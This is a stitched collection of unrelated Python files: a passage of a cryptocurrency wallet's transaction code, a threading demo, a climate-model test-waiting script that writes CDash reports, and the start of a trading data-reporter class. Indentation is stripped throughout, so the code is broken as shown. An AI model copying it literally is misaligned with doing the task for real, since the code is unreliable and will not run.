if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out ot network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserializd tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise of error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always be exactly equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
# ---
class OPReturn:
''' OPReturn helper namespace. Used by GUI main_window.py and also
oregano/commands.py '''
class Error(Exception):
""" thrown when the OP_RETURN for a tx not of the right format """
class TooLarge(Error):
""" thrown when the OP_RETURN for a tx is >220 bytes """
@staticmethod
def output_for_stringdata(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturn.TooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
@staticmethod
def output_for_rawhex(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturn.Error(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput.protocol_factory(op_return_script), amount)
# /OPReturn
|
main_thread.py
|
import threading
import time
def my_child_thread():
print("Child Thread Starting")
time.sleep(5)
print("Current Thread ----------")
print(threading.current_thread())
print("-------------------------")
print("Main Thread -------------")
print(threading.main_thread())
print("-------------------------")
print("Child Thread Ending")
child = threading.Thread(target=my_child_thread)
child.start()
child.join()
|
wait_for_tests.py
|
#pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy, CIMEError
from CIME.XML.machines import Machines
from CIME.test_status import *
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "ACME_Climate"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_xml_boiler(phase, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit):
###############################################################################
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
phase_elem = xmlet.SubElement(site_elem, phase)
xmlet.SubElement(phase_elem, "StartDateTime").text = time.ctime(current_time)
xmlet.SubElement(phase_elem, "Start{}Time".format("Test" if phase == "Testing" else phase)).text = str(int(current_time))
return site_elem, phase_elem
###############################################################################
def create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, config_elem = create_cdash_xml_boiler("Configure", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(config_elem, "ConfigureCommand").text = "namelists"
config_results = []
for test_name in sorted(results):
test_status = results[test_name][1]
config_results.append("{} {} Config {}".format("" if test_status != NAMELIST_FAIL_STATUS else "CMake Warning:\n", test_name, "PASS" if test_status != NAMELIST_FAIL_STATUS else "NML DIFF"))
xmlet.SubElement(config_elem, "Log").text = "\n".join(config_results)
xmlet.SubElement(config_elem, "ConfigureStatus").text = "0"
xmlet.SubElement(config_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Configure.xml"))
###############################################################################
def create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, build_elem = create_cdash_xml_boiler("Build", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
xmlet.SubElement(build_elem, "ConfigureCommand").text = "case.build"
build_results = []
for test_name in sorted(results):
build_results.append(test_name)
xmlet.SubElement(build_elem, "Log").text = "\n".join(build_results)
for idx, test_name in enumerate(sorted(results)):
test_path = results[test_name][0]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
if get_test_time(test_norm_path) == 0:
error_elem = xmlet.SubElement(build_elem, "Error")
xmlet.SubElement(error_elem, "Text").text = test_name
xmlet.SubElement(error_elem, "BuildLogLine").text = str(idx)
xmlet.SubElement(error_elem, "PreContext").text = test_name
xmlet.SubElement(error_elem, "PostContext").text = ""
xmlet.SubElement(error_elem, "RepeatCount").text = "0"
xmlet.SubElement(build_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Build.xml"))
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit):
###############################################################################
site_elem, testing_elem = create_cdash_xml_boiler("Testing", cdash_build_name, cdash_build_group, utc_time, current_time, hostname, git_commit)
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
xmlet.SubElement(test_list_elem, "Test").text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS]
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if test_passed:
full_test_elem.attrib["Status"] = "passed"
elif (test_status == TEST_PEND_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
xmlet.SubElement(full_test_elem, "Name").text = test_name
xmlet.SubElement(full_test_elem, "Path").text = test_norm_path
xmlet.SubElement(full_test_elem, "FullName").text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
xmlet.SubElement(named_measurement_elem, "Value").text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
xmlet.SubElement(testing_elem, "ElapsedMinutes").text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
###############################################################################
def create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value CIMEROOT", from_dir=first_result_case)
except CIMEError:
# Use repo containing this script as last resort
srcroot = CIME.utils.get_cime_root()
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
create_cdash_config_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_build_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname, data_rel_path, git_commit)
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(SHAREDLIB_BUILD_PHASE)
build_status = TEST_FAIL_STATUS if build_status == TEST_FAIL_STATUS else ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
test_log_path = os.path.join(os.path.dirname(test_status_filepath), ".internal_test_status.log")
# We don't want to make it a requirement that wait_for_tests has write access
# to all case directories
try:
fd = open(test_log_path, "w")
fd.close()
except (IOError, OSError):
test_log_path = "/dev/null"
prior_ts = None
with open(test_log_path, "w") as log_fd:
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=not no_run, # Important
no_run=no_run,
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if prior_ts is not None and prior_ts != ts:
log_fd.write(ts.phase_statuses_dump())
log_fd.write("OVERALL: {}\n\n".format(test_status))
prior_ts = ts
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False, no_run=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise CIMEError("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False,
no_run=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
|
ExtToolDefs.py
|
import json
import time
from threading import Thread
def fileToJson(filename, encoding="utf-8"):
f = open(filename, 'r')
content = f.read()
f.close()
try:
return json.loads(content)
except:
return None
class BaseIndexWriter:
'''
基础指标输出工具
'''
def __init__(self):
return
def write_indicator(self, id:str, tag:str, time:int, data:dict):
'''
将指标数据出\n
@id 指标ID\n
@tag 数据标记\n
@time 指标时间\n
@data 数据对象,一个dict
'''
raise Exception("Basic writer cannot output index data to any media")
class BaseDataReporter:
'''
数据报告器
'''
TaskReportRTData = 1
TaskReportSettleData = 2
TaskReportInitData = 3
def __init__(self, id:str):
self.__inited__ = False
self.__id__ = id
return
def init(self):
self.__inited__ = True
self.__thrd_task__ = None
self.__tasks__ = list()
self.__stopped__ = False
#读取策略标记
filename = "./generated/marker.json"
obj = fileToJson(filename)
if obj is not None:
self.stra_names = obj["marks"]
def rpt_portfolio_rt_data_impl(self, rtData):
raise Exception("this method has not been implemented")
def rpt_strategy_rt_data_impl(self, rtData):
raise Exception("this method has not been implemented")
def rpt_init_data_impl(self, initData):
raise Exception("this method has not been implemented")
def __do_report_rt_data__(self):
print("settle data reporter triggered")
# 第一步,提交组合数据,读取portfolio
filename = "./generated/portfolio/datas.json"
objPort = fileToJson(filename)
objPort["pid"] = self.__id__
# 开始提交组合数据
self.rpt_portfolio_rt_data_impl(objPort)
# 第二步,提交策略数据
for sname in self.stra_names:
filename = "./generated/stradata/" + sname + ".json"
objStra = fileToJson(filename)
objStra["pid"] = self.__id__
objStra["sid"] = sname
self.rpt_strategy_rt_data_impl(objStra)
def __task_loop__(self):
while not self.__stopped__:
if len(self.__tasks__) == 0:
time.sleep(1)
continue
else:
taskid = self.__tasks__.pop(0)
if taskid == self.TaskReportRTData:
self.__do_report_rt_data__()
elif taskid == self.TaskReportSettleData:
self.__do_report_settle_data__()
elif taskid == self.TaskReportInitData:
self.__do_report_init_data__()
def __start__(self):
if self.__thrd_task__ is None:
self.__thrd_task__ = Thread(target=self.__task_loop__, name="reportthread")
